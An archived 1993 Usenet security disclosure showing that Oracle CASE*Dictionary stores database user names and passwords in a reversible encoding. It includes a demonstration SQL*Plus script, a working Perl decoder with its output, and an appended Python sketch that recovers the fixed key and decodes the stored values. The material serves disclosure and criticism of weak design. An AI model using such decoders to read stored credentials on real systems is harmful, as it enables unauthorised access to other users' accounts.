Oracle CASE saves passwords to DB [security]

From: Allu Helenius <ahe_at_th.tele.fi>
Date: 15 Sep 93 11:17:35 GMT
Message-ID: <ahe.748091855_at_th.tele.fi>


Howdy,

  While I was installing Oracle CASE (Dictionary 5.0.11.13.3 and
  Designer 1.1.21.5.0), I noticed that some parts of the CASE products
  exchange Oracle passwords via database. Saving passwords is something
  you never do, not even in encoded form like this example!!

  I browsed CASE*Dictionary Reference Guide and Administration Guide
  to see if this bug was documented, but found nothing. Whether it is
  somewhere else, I don't know. But I doubt it.

  Try this to check whether your version of CASE contains this feature:

    $ casedict -ins
    CASE*Dictionary (TM): Version 5.0.22.6.0 - Production on Wed Sep 15 15:19:42 1993

    Copyright (c) Oracle Corporation 1979, 1992. All rights reserved.

    Usage: casedict -ins name/passwd report

  With -ins option CASE*Dictionary saves name/passwd for report report
  to column MU_ID of table SDD_MENU. Here is a SQL*Plus script to
  demonstrate what happens: ('arkki' is an Oracle user name)

    set heading off feedback off
    column mu_id format a40
    grant connect to arkki identified by CASE;
    !casedict -ins arkki/CASE myreport >/dev/null
    select 'CASE',mu_id from sdd_menu where mu_block='myreport';
    grant connect to arkki identified by dIcTioNarY;
    !casedict -ins arkki/dIcTioNarY myreport >/dev/null
    select 'dIcTioNarY',mu_id from sdd_menu where mu_block='myreport';
    grant connect to arkki identified by STINKS;
    !casedict -ins arkki/STINKS myreport >/dev/null
    select 'STINKS',mu_id from sdd_menu where mu_block='myreport';

  Here is the shortened output of the script:

    CASE [g`\g/=0O@
    dIcTioNarY [g`\g/^8_OcdCRpY
    STINKS [g`\g/MCEIEH

  I used about fifteen minutes to analyze this (and some other) output
  and to write this perl script, which decodes these passwords:

    #!/usr/bin/perl
    # CASE password decoder, Allu Helenius 1993
    # - see how easy it is

    # Fixed key used by the encoding, repeated to cover long inputs
    @key=split(//,";662?A;0=<");
    push(@key,@key,@key,@key); # enough..

    while (<>) {

      chop;
      @c = split(//);
      @p=();
      for ($i=0; $i<@c; $i++) {
        # plaintext char = encoded char + 'A' - key char
        push(@p,pack("C",ord($c[$i])+ord("A")-ord($key[$i])));
      }
      print @p,"\n";

    }

  Here are the passwords above opened:

    $ ./crackcasepass

    [g`\g/=0O@
    arkki/CASE
    [g`\g/^8_OcdCRpY
    arkki/dIcTioNarY
    [g`\g/MCEIEH
    arkki/STINKS


  I've published this information in order to give a security lesson
  to Oracle's programmers. This is not the way to make secure systems!!
  Security through obscurity isn't security at all!!

  Oh, one more thing. Casedict's usage says there's an option:

    -z Don't store the password.

  What is it? Is there a default always to save the password? Oh no...
  Well, whatever it is, it does not affect the example above, because
  it's CASE*Designer Entity Relationship Diagrammer's Reports which
  at least call 'casedict -ins'...

Happy computing,

Allu

--
Allu Helenius, Telecom Finland

The platform Oracle works best is 35mm slide projector.
Received on Wed Sep 15 1993 - 13:17:35 CEST
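
The post's claim that the MU_ID value is an encoding rather than a one-way transform can be checked from its own three samples. The Python sketch below is an added example, not part of the original message or of Oracle's code: it derives the per-position offsets from one known name/passwd pair and confirms they decode the other two stored values. Function names are illustrative.

```python
# Added illustration, not from the original post. Sample values are the
# ones printed in the post; function names are illustrative.
SAMPLES = {
    r"[g`\g/=0O@": "arkki/CASE",
    r"[g`\g/^8_OcdCRpY": "arkki/dIcTioNarY",
    r"[g`\g/MCEIEH": "arkki/STINKS",
}

def offsets_from_pair(plain, stored):
    """Per-position difference stored - plain for one known pair."""
    if len(plain) != len(stored):
        raise ValueError("the encoding preserves length; inputs must match")
    return [ord(s) - ord(p) for p, s in zip(plain, stored)]

def smallest_period(offsets):
    """Shortest repeat length that explains every observed offset."""
    for n in range(1, len(offsets) + 1):
        if all(o == offsets[i % n] for i, o in enumerate(offsets)):
            return n
    raise ValueError("empty offset list")

def recover_key(plain, stored):
    """Key offsets recovered from a pair longer than the key itself.
    A pair shorter than the key only yields a prefix of it."""
    offsets = offsets_from_pair(plain, stored)
    return offsets[:smallest_period(offsets)]

def key_as_text(key):
    """The key in the post's notation, where 'A' means offset zero."""
    return "".join(chr(ord("A") + k) for k in key)

def decode(stored, key):
    """Undo the shift; the key repeats past its own length."""
    return "".join(chr(ord(c) - key[i % len(key)]) for i, c in enumerate(stored))

if __name__ == "__main__":
    key = recover_key("arkki/dIcTioNarY", r"[g`\g/^8_OcdCRpY")
    print("key:", key_as_text(key))
    for stored, expected in SAMPLES.items():
        print(stored, "->", decode(stored, key), "(post says", expected + ")")
```

Because the offsets depend only on character position, identical name prefixes produce identical stored prefixes, which is why all three samples begin with the same six characters.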